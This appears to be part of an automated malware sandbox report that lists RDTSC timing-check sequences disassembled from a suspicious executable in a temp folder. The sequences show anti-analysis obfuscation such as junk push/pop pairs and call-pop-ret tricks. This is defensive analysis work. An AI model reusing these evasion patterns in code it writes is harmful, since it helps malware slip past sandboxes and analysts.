Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D35B3 second address: 7D35B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D35B9 second address: 7D35C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D35C2 second address: 7D35C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D39F1 second address: 7D39FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FAF7C6A41A8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D39FF second address: 7D3A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D5D2A second address: 7D5D4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007FAF7C6A41A6h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAF7C6A41ACh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D5D4C second address: 7D5D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D5D50 second address: 7D5D66 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FAF7C6A41AAh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7A355F second address: 7A356A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7A356A second address: 7A356E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7A356E second address: 7A358B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7A358B second address: 7A3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D918D second address: 7D9199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D9199 second address: 7D919D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC4C8 second address: 7DC4D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC4D7 second address: 7DC4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC4DC second address: 7DC502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAF7CBD5D36h 0x00000009 jmp 00007FAF7CBD5D3Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007FAF7CBD5D36h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC502 second address: 7DC506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC506 second address: 7DC50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC50C second address: 7DC511 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC511 second address: 7DC536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAF7CBD5D43h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DC536 second address: 7DC53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DFECF second address: 7DFED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DFED6 second address: 7DFEF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FAF7C6A41BEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FAF7C6A41A6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7DFEF7 second address: 7DFF01 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7CBD5D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E024B second address: 7E0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAF7C6A41A6h 0x0000000a popad 0x0000000b js 00007FAF7C6A41AAh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E0260 second address: 7E026A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E026A second address: 7E0271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E06A6 second address: 7E06AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E23EA second address: 7E2406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E25A2 second address: 7E25BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E26A9 second address: 7E26B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E26B7 second address: 7E26BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E26BB second address: 7E26BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E2C9C second address: 7E2CB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7CBD5D3Ch 0x00000008 jnl 00007FAF7CBD5D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E2DB8 second address: 7E2DCA instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E2DCA second address: 7E2DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E2DCE second address: 7E2DD4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E3196 second address: 7E31B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF7CBD5D43h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E384D second address: 7E3851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E54D9 second address: 7E54DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E54DD second address: 7E5551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FAF7C6A41B8h 0x0000000c jmp 00007FAF7C6A41B2h 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007FAF7C6A41B1h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FAF7C6A41A8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 cmc 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a movsx edi, bx 0x0000003d xchg eax, ebx 0x0000003e jmp 00007FAF7C6A41AFh 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jc 00007FAF7C6A41A8h 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E5F24 second address: 7E5F2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E5F2E second address: 7E5F82 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FAF7C6A41A8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov si, 75ADh 0x0000002e push 00000000h 0x00000030 add edi, dword ptr [ebp+122D2163h] 0x00000036 xchg eax, ebx 0x00000037 push esi 0x00000038 pushad 0x00000039 jmp 00007FAF7C6A41ABh 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 popad 0x00000041 pop esi 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 pop edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E6B0D second address: 7E6B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7477 second address: 7E7484 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7484 second address: 7E7520 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF7CBD5D38h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FAF7CBD5D38h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov esi, edi 0x00000029 stc 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FAF7CBD5D38h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 movzx esi, bx 0x00000049 push 00000000h 0x0000004b pushad 0x0000004c jmp 00007FAF7CBD5D40h 0x00000051 call 00007FAF7CBD5D45h 0x00000056 or bx, 3C7Eh 0x0000005b pop ebx 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FAF7CBD5D44h 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7520 second address: 7E752B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAF7C6A41A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7FA2 second address: 7E7FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7FA6 second address: 7E7FAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7FAC second address: 7E7FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAF7CBD5D36h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7FB6 second address: 7E7FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E8A20 second address: 7E8A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D45h 0x00000009 popad 0x0000000a pop eax 0x0000000b nop 0x0000000c or edi, dword ptr [ebp+122D36C6h] 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+124566ADh] 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D29DFh] 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 je 00007FAF7CBD5D36h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E5CB7 second address: 7E5CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E67D8 second address: 7E67DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7245 second address: 7E7252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FAF7C6A41ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E5CBD second address: 7E5CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7ED946 second address: 7ED9A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FAF7C6A41A8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D27CFh], edi 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+122D34EBh], edx 0x00000035 xchg eax, esi 0x00000036 ja 00007FAF7C6A41B2h 0x0000003c jnl 00007FAF7C6A41ACh 0x00000042 push eax 0x00000043 je 00007FAF7C6A41B0h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E5CC1 second address: 7E5CE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E7D84 second address: 7E7D8E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EFFA4 second address: 7EFFAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FAF7CBD5D36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EFFAF second address: 7EFFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FAF7C6A41B4h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FAF7C6A41A6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EFFC5 second address: 7F0046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FAF7CBD5D38h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 jmp 00007FAF7CBD5D46h 0x00000026 call 00007FAF7CBD5D3Fh 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e mov edi, esi 0x00000030 push 00000000h 0x00000032 jo 00007FAF7CBD5D4Fh 0x00000038 jmp 00007FAF7CBD5D49h 0x0000003d xchg eax, esi 0x0000003e jp 00007FAF7CBD5D54h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F20CE second address: 7F2138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D381Ah] 0x00000012 movsx ebx, si 0x00000015 push 00000000h 0x00000017 mov di, C33Bh 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FAF7C6A41A8h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 mov bx, ax 0x0000003a or dword ptr [ebp+122D30CEh], esi 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FAF7C6A41AFh 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F2138 second address: 7F2153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D47h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F2153 second address: 7F2165 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F2165 second address: 7F2169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F602E second address: 7F603E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F603E second address: 7F605A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FAF7CBD5D3Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F605A second address: 7F6069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FAF7C6A41A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F6069 second address: 7F606D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F9669 second address: 7F966D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7ABBB9 second address: 7ABBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D48h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7ABBD8 second address: 7ABBF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F9C2E second address: 7F9C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
